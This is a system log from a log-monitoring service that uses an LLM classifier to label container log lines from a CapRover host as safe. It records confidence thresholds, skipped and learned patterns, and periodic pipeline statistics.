Mar 20 13:12:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:38.827865 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 13:12:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:38.827904 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 20 13:12:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:40.410841 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 13:12:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:40.410886 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 13:12:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:43.787949 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.73 action=allow pattern_type=prefix
Mar 20 13:12:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:43.787988 [analyzer] Confidence 0.73 too low for pattern learning (need 0.85+)
Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599313 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599343 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "duration" seen in 20/20 lines, example: "3.085 ms" → "<DUR>"
Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599352 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "byte_count" seen in 18/20 lines, example: "7584137" → "<BYTES>"
Mar 20 13:12:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:46.599363 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 13:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:52.239717 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 13:12:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:52.239761 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 13:12:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:55.427560 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 13:12:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:12:55.427597 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+)
Mar 20 13:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:02.020522 [observer] Pipeline: processed=5537 pattern_hits=5283 llm_calls=254 llm_errors=3 learned=3
Mar 20 13:13:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:02.020560 [observer] Patterns: hash=5283 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:13:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:04.511782 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 13:13:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:04.511822 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [allow]: "captain.admin.kovicloud.com"
Mar 20 13:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:31.938192 [observer] Pipeline: processed=5543 pattern_hits=5289 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:13:31.938216 [observer] Patterns: hash=5289 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:01.960684 [observer] Pipeline: processed=5545 pattern_hits=5291 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:01.963854 [observer] Patterns: hash=5291 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:31.935668 [observer] Pipeline: processed=5549 pattern_hits=5295 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:14:31.935693 [observer] Patterns: hash=5295 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:01.955771 [observer] Pipeline: processed=5551 pattern_hits=5297 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:01.955817 [observer] Patterns: hash=5297 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:31.937758 [observer] Pipeline: processed=5555 pattern_hits=5301 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:15:31.937786 [observer] Patterns: hash=5301 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:01.951055 [observer] Pipeline: processed=5557 pattern_hits=5303 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:01.951081 [observer] Patterns: hash=5303 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:31.935815 [observer] Pipeline: processed=5562 pattern_hits=5308 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:16:31.935840 [observer] Patterns: hash=5308 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:01.972022 [observer] Pipeline: processed=5565 pattern_hits=5311 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:01.972084 [observer] Patterns: hash=5311 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:31.935642 [observer] Pipeline: processed=5567 pattern_hits=5313 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:17:31.935667 [observer] Patterns: hash=5313 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:01.980834 [observer] Pipeline: processed=5571 pattern_hits=5317 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:01.980869 [observer] Patterns: hash=5317 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:31.946481 [observer] Pipeline: processed=5573 pattern_hits=5319 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:18:31.946513 [observer] Patterns: hash=5319 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:01.955592 [observer] Pipeline: processed=5577 pattern_hits=5323 llm_calls=254 llm_errors=3 learned=4
Mar 20 13:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:01.955625 [observer] Patterns: hash=5323 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=254
Mar 20 13:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:10.599609 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 13:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:10.599649 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 13:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:31.946583 [observer] Pipeline: processed=5580 pattern_hits=5325 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:19:31.946606 [observer] Patterns: hash=5325 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:01.960946 [observer] Pipeline: processed=5583 pattern_hits=5328 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:01.961000 [observer] Patterns: hash=5328 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:31.937135 [observer] Pipeline: processed=5586 pattern_hits=5331 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:20:31.937187 [observer] Patterns: hash=5331 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:01.967975 [observer] Pipeline: processed=5588 pattern_hits=5333 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:01.968007 [observer] Patterns: hash=5333 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:31.935084 [observer] Pipeline: processed=5592 pattern_hits=5337 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:21:31.935111 [observer] Patterns: hash=5337 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:01.972084 [observer] Pipeline: processed=5596 pattern_hits=5341 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:01.972111 [observer] Patterns: hash=5341 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:31.937497 [observer] Pipeline: processed=5600 pattern_hits=5345 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:22:31.937528 [observer] Patterns: hash=5345 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:01.962053 [observer] Pipeline: processed=5602 pattern_hits=5347 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:01.962085 [observer] Patterns: hash=5347 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:31.936876 [observer] Pipeline: processed=5605 pattern_hits=5350 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:23:31.936903 [observer] Patterns: hash=5350 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:01.947282 [observer] Pipeline: processed=5608 pattern_hits=5353 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:01.947307 [observer] Patterns: hash=5353 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:31.935373 [observer] Pipeline: processed=5610 pattern_hits=5355 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:24:31.935395 [observer] Patterns: hash=5355 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:02.026087 [observer] Pipeline: processed=5614 pattern_hits=5359 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:25:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:02.026124 [observer] Patterns: hash=5359 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:31.936364 [observer] Pipeline: processed=5616 pattern_hits=5361 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:25:31.936393 [observer] Patterns: hash=5361 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:01.962257 [observer] Pipeline: processed=5620 pattern_hits=5365 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:01.962304 [observer] Patterns: hash=5365 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:31.946132 [observer] Pipeline: processed=5622 pattern_hits=5367 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:26:31.946178 [observer] Patterns: hash=5367 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:01.948143 [observer] Pipeline: processed=5627 pattern_hits=5372 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:01.948184 [observer] Patterns: hash=5372 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:31.935144 [observer] Pipeline: processed=5630 pattern_hits=5375 llm_calls=255 llm_errors=3 learned=4
Mar 20 13:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:31.935196 [observer] Patterns: hash=5375 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=255
Mar 20 13:27:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:41.986482 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 13:27:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:27:41.986520 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 13:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:01.955415 [observer] Pipeline: processed=5634 pattern_hits=5378 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:01.955447 [observer] Patterns: hash=5378 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:31.938180 [observer] Pipeline: processed=5638 pattern_hits=5382 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:28:31.938206 [observer] Patterns: hash=5382 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:29:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:02.009109 [observer] Pipeline: processed=5640 pattern_hits=5384 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:29:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:02.009136 [observer] Patterns: hash=5384 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:31.936542 [observer] Pipeline: processed=5644 pattern_hits=5388 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:29:31.936567 [observer] Patterns: hash=5388 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:01.951668 [observer] Pipeline: processed=5646 pattern_hits=5390 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:01.951697 [observer] Patterns: hash=5390 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:31.934943 [observer] Pipeline: processed=5649 pattern_hits=5393 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:30:31.934968 [observer] Patterns: hash=5393 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:01.943406 [observer] Pipeline: processed=5652 pattern_hits=5396 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:01.943531 [observer] Patterns: hash=5396 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:31.940795 [observer] Pipeline: processed=5654 pattern_hits=5398 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:31:31.940826 [observer] Patterns: hash=5398 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:01.961250 [observer] Pipeline: processed=5660 pattern_hits=5404 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:01.961286 [observer] Patterns: hash=5404 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:31.937381 [observer] Pipeline: processed=5662 pattern_hits=5406 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:32:31.937413 [observer] Patterns: hash=5406 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:01.950424 [observer] Pipeline: processed=5666 pattern_hits=5410 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:01.950452 [observer] Patterns: hash=5410 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:31.943284 [observer] Pipeline: processed=5668 pattern_hits=5412 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:33:31.943308 [observer] Patterns: hash=5412 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:01.954575 [observer] Pipeline: processed=5670 pattern_hits=5414 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:01.954604 [observer] Patterns: hash=5414 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:31.935099 [observer] Pipeline: processed=5674 pattern_hits=5418 llm_calls=256 llm_errors=3 learned=4
Mar 20 13:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:34:31.935124 [observer] Patterns: hash=5418 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=256
Mar 20 13:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:01.951435 [observer] Pipeline: processed=5677 pattern_hits=5420 llm_calls=257 llm_errors=3 learned=4
Mar 20 13:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:01.951467 [observer] Patterns: hash=5420 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=257
Mar 20 13:35:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:07.669295 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 13:35:07 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:07.669351 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 13:35:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:13.524349 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=contains
Mar 20 13:35:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:13.524426 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 13:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:17.693112 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 13:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:17.693147 [analyzer] Confidence 0.70 too low for pattern learning (need 0.85+)
Mar 20 13:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:31.938319 [observer] Pipeline: processed=5683 pattern_hits=5424 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:35:31.938348 [observer] Patterns: hash=5424 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:01.953070 [observer] Pipeline: processed=5685 pattern_hits=5426 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:01.953094 [observer] Patterns: hash=5426 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:31.935643 [observer] Pipeline: processed=5689 pattern_hits=5430 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:36:31.935668 [observer] Patterns: hash=5430 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:01.963033 [observer] Pipeline: processed=5693 pattern_hits=5434 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:01.963066 [observer] Patterns: hash=5434 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:31.953940 [observer] Pipeline: processed=5695 pattern_hits=5436 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:37:31.953969 [observer] Patterns: hash=5436 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:01.940877 [observer] Pipeline: processed=5699 pattern_hits=5440 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:01.940910 [observer] Patterns: hash=5440 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:31.951501 [observer] Pipeline: processed=5701 pattern_hits=5442 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:38:31.951535 [observer] Patterns: hash=5442 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:01.956845 [observer] Pipeline: processed=5705 pattern_hits=5446 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:01.956876 [observer] Patterns: hash=5446 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:31.946360 [observer] Pipeline: processed=5707 pattern_hits=5448 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:39:31.946387 [observer] Patterns: hash=5448 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:01.981360 [observer] Pipeline: processed=5711 pattern_hits=5452 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:01.981390 [observer] Patterns: hash=5452 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:31.936545 [observer] Pipeline: processed=5713 pattern_hits=5454 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:40:31.936576 [observer] Patterns: hash=5454 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:01.988359 [observer] Pipeline: processed=5715 pattern_hits=5456 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:01.988583 [observer] Patterns: hash=5456 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:31.935558 [observer] Pipeline: processed=5719 pattern_hits=5460 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:41:31.935581 [observer] Patterns: hash=5460 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:01.962326 [observer] Pipeline: processed=5723 pattern_hits=5464 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:01.962365 [observer] Patterns: hash=5464 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:31.939236 [observer] Pipeline: processed=5727 pattern_hits=5468 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:42:31.939257 [observer] Patterns: hash=5468 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:01.964837 [observer] Pipeline: processed=5729 pattern_hits=5470 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:01.964870 [observer] Patterns: hash=5470 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
Mar 20 13:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:31.936249 [observer] Pipeline: processed=5733 pattern_hits=5474 llm_calls=259 llm_errors=3 learned=4
Mar 20 13:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 13:43:31.936272 [observer] Patterns: hash=5474 prefix=0 regex=0 contains=0 deny=24 alert=432 suppress=0 misses=259
